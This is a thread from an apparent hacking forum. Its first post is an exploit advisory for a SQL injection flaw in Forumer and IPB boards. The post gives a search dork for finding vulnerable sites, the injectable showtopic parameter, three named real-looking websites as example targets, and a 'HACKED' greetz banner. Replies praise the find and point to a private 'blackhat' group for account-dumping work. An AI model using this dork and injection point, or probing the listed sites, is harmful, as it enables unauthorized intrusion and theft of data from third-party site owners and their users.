iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Forumer & IPB == SQL Injection Vulnerability
  • linc0ln.dll
    Posts: 19 
    ---------------------------------------------------------------------
    Exploit Title : Forumer & IPB == SQL Injection Vulnerability
    ---------------------------------------------------------------------

    Author      : linc0ln.dll
    Date        : 16/06/11
    Site        : http://linc0ln.pl/
    @  	        : linc0ln[at]e-o-u.org
    ---------------------------------------------------------------------

    Description >

    Category    : WebApps
    Dork        : \"Powered by Forumer & IPB\"
    Vendor 	    : http://www.forumer.com/ & http://www.invisionpower.com/
    Tested On   : Windows 7
    ---------------------------------------------------------------------

    SQL Inj.    >

    >> http://127.0.0.1/[path]/index.php?showtopic={SQL}
    ---------------------------------------------------------------------

    Example     >

    >>	        http://www.sound-thinking.org/index.php?showtopic={SQL}
    >>          http://kiss2wat.co.nr/index.php?showtopic={SQL}
    >>          http://www.javelin70.com/index.php?showtopic={SQL}
    ---------------------------------------------------------------------

    \ \  / /                 /\
    -HACKED-  \\{__}//      /((\
    / /  \ \   \|aa|/        ) )
    _____vvvV__(oo)__Vvvv__(_(_
    |            ``             |
    |      .::Greetz To::.      |
    | [synthelyps.c]  [fight3r] |
    | [Mario_Vs]      [n1k0n3r] |
    | [e-o-u.org]  [Skynet Crew]|
    | And All The Other Friends |
    |___________________________|
                 ';;;;;(  )`
                   \ \/ \ \//
                  _/_/ _/ /
                 vvvV^ Vvvv
  • acton1x
    Posts: 9
    Nice find. Funny when you try SQLi out on one of those boards. The board returns you the whole SQL command with the error :P
  • Mr. P-teoMr. P-teo
    Posts: 269
    ^ nice find although if your going to be posting stuff like this you may wanna ask sh3llc0d3 if you can join the blackhat group.
    Skype: mrpt3o
    Twitter: MrPteo


    image
  • Sh3llc0d3
    Posts: 1,910
    Just to clarify - Proof of concepts are fine but we were wanting to keep blackhat related stuff off the public forum. When I walked you (p-teo) through SQLi I demonstrated dumping account info which is against public forum rules since Xinapse changed the rules (I think it was banned before actually).

    Info on joining the blackhat usergroup can be found here if anyone is interested :)

    sh3llc0d3
Add a Comment